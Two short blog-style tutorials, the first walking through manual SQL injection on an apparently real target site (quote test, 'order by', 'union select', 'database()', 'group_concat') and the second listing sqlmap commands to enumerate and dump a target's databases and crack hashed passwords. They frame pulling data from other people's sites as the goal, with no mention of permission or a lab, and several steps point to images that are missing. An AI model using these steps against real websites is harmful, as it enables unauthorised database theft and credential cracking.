Manual SQL Injection

• Hello everyone, this blog is related manual SQL injection.

Step 1: 

First you have to open your target website, here we are going to perform manual SQL injection on .pk website. 

 

Website:www.sample.com

Step:1

First we have to check that this website is inject or not (add ' after URL)

yes!!! it is

Step:2

Now we have to check available tables in website using given SQL query “order by”

Step:3

Now using the union select query. add - before id number

Now you retrieve data according to you needs

Step:4

Now replacing 2 with database(),we got the available database.

Step:5

Now using union select group concat query we got the following database tables details.

Step:6

Now using union select group concat query we got the following database tables columns details.

Huh! SQL Injections are all about guess & try. It could take a lot of trial & error to get that perfect query.

 

Database dump using sqlmap

•  Hello everyone this blog is related to database  dump using sqlmap.
• Database dump using Sqlmap

Step 1: Open Kali Linux

Step 2: Type command to get all functions of ‘Sqlmap’.

              # sudo sqlmap -hh

Step 3: Type command to see that the target website contains sql injection vulnerability or not.

             # sudo sqlmap -u “targetsite.com”

Step 4: To see the number of database target website has can be done with

             # sudo sqlmap -u “targetsite.com” –dbs

Step 5: To list the tables that we want from any of the above database use command

             # sudo sqlmap -u “targetsite.com” -D database_name –tables

Step 6: To list content of the particular table use command

              # sudo sqlmap -u “targetsite.com” -D database_name -T table_name –dump

 

Step 7:  If you want to use dictionary attack in sqlmap when you receive hashed password, follow the given steps

                                       

Step 8: You got the data.